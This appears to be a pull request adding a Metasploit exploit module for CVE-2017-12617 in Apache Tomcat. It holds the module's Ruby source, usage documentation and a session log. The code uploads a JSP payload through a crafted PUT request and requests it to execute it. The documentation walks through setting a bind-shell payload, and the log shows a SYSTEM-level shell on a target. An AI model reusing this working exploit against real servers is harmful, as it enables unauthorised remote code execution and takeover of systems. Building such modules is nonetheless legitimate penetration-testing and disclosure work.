### PR TITLE
Tomcat JSP Upload via PUT Bypass

### DIFF
--- a/documentation/modules/exploit/multi/http/tomcat_jsp_upload_bypass.md
+++ b/documentation/modules/exploit/multi/http/tomcat_jsp_upload_bypass.md
@@ -1,0 +1,53 @@
+## Description
+
+This module uses a PUT request bypass to upload a jsp shell to a vulnerable Apache Tomcat configuration.
+
+## Vulnerable Application
+	
+When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialization parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617
+
+To set up a vulnerable installation:
+1. Download and install an affected version of Apache Tomcat.
+2. Download and install Java. [Choose an appropriate version](http://tomcat.apache.org/whichversion.html) based on the Apache Tomcat version you downloaded.
+3. In conf directory of Apache Tomcat, edit the web.xml file and set the "readonly" parameter to false for the default servlet.
+4. Restart the Tomcat service.
+
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/http/tomcat_jsp_upload_bypass```
+1. Do: ```set payload java/jsp_shell_bind_tcp```
+2. Do: ```set RHOST [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```check```
+5. It should be reported as vulnerable
+6. Do: ```run```
+7. You should get a shell
+
+## Scenarios
+
+```
+msf > use exploit/multi/http/tomcat_jsp_upload_bypass 
+msf exploit(tomcat_jsp_upload_bypass) > set payload java/jsp_shell_bind_tcp 
+payload => java/jsp_shell_bind_tcp
+msf exploit(tomcat_jsp_upload_bypass) > set RHOST 10.10.40.93
+RHOST => 10.10.40.93
+msf exploit(tomcat_jsp_upload_bypass) > set RPORT 8080
+RPORT => 8080
+msf exploit(tomcat_jsp_upload_bypass) > check
+[+] 10.10.40.93:8080 The target is vulnerable.
+msf exploit(tomcat_jsp_upload_bypass) > run
+
+[*] Started bind handler
+[*] Uploading payload...
+[*] Payload executed!
+[*] Command shell session 1 opened (10.10.230.230:39979 -> 10.10.40.93:4444) at 2017-10-11 07:43:08 -0400
+
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\apache-tomcat-7.0.81>whoami
+whoami
+nt authority\system
+
+```

--- a/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
+++ b/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
@@ -51,11 +49,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => 'Oct 03 2017',
       'DefaultTarget'  => 0))
 
-    register_options(
-      [
+    register_options([
         OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
         Opt::RPORT(8080)
-      ], self.class)
+      ])
   end
 
   def check
@@ -67,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'    => 'PUT',
       'data'      => "<% out.println(\"#{testcontent}\");%>"
     })
-    
+
     res1 = send_request_cgi({
       'uri'       => normalize_uri(target_uri,"#{testurl}.jsp"),
       'method'    => 'GET'

--- a/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
+++ b/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
@@ -1,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Tomcat RCE via JSP Upload Bypass',
+      'Description'    => %q{
+        This module uploads a jsp payload and executes it.
+      },
+      'Author'      => 'peewpw',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-12617' ],
+          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],
+          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]
+        ],
+      'Privileged'     => false,
+      'Platform'    => %w{ linux win }, # others?
+      'Targets'     =>
+        [
+          [ 'Automatic',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Java Windows',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Java Linux',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Oct 03 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
+        Opt::RPORT(8080)
+      ], self.class)
+  end
+
+  def check
+    testurl = Rex::Text::rand_text_alpha(10)
+    testcontent = Rex::Text::rand_text_alpha(10)
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri,"#{testurl}.jsp/"),
+      'method'    => 'PUT',
+      'data'      => "<% out.println(\"#{testcontent}\");%>"
+    })
+    
+    res1 = send_request_cgi({
+      'uri'       => normalize_uri(target_uri,"#{testurl}.jsp"),
+      'method'    => 'GET'
+    })
+
+    if res1 and res1.body.include?(testcontent)
+      res1 = send_request_cgi({
+        'uri'       => normalize_uri(target_uri,"#{testurl}.jsp/"),
+        'method'    => 'DELETE',
+        'timeout'   => 1
+      })
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    print_status("Uploading payload...")
+    testurl = Rex::Text::rand_text_alpha(10)
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri,"#{testurl}.jsp/"),
+      'method'    => 'PUT',
+      'data'      => "#{payload.encoded}"
+    })
+    if res and res.code == 201
+      res1 = send_request_cgi({
+        'uri'       => normalize_uri(target_uri,"#{testurl}.jsp"),
+        'method'    => 'GET'
+      })
+      if res1 and res1.code == 200
+        print_status("Payload executed!")
+      else
+        fail_with(Failure::Unknown, "Failed to execute the payload")
+      end
+    else
+      fail_with(Failure::Unknown, "Failed to upload the payload")
+    end
+
+  end
+end
+

--- a/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
+++ b/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
@@ -74,11 +74,13 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res1 and res1.body.include?(testcontent)
-      res1 = send_request_cgi({
-        'uri'       => normalize_uri(target_uri,"#{testurl}.jsp/"),
-        'method'    => 'DELETE',
-        'timeout'   => 1
-      })
+      res2 = send_request_cgi(
+        opts = {
+          'uri'       => normalize_uri(target_uri,"#{testurl}.jsp/"),
+          'method'    => 'DELETE'
+        },
+        timeout = 1
+      )
       return Exploit::CheckCode::Vulnerable
     end
 


### PR DESCRIPTION
Added a module for CVE-2017-12617 which uploads a jsp shell and executes it.
Original PoC: https://bz.apache.org/bugzilla/show_bug.cgi?id=61542
Module info: https://www.peew.pw/blog/2017/10/9/new-vulnerability-same-old-tomcat-cve-2017-12615

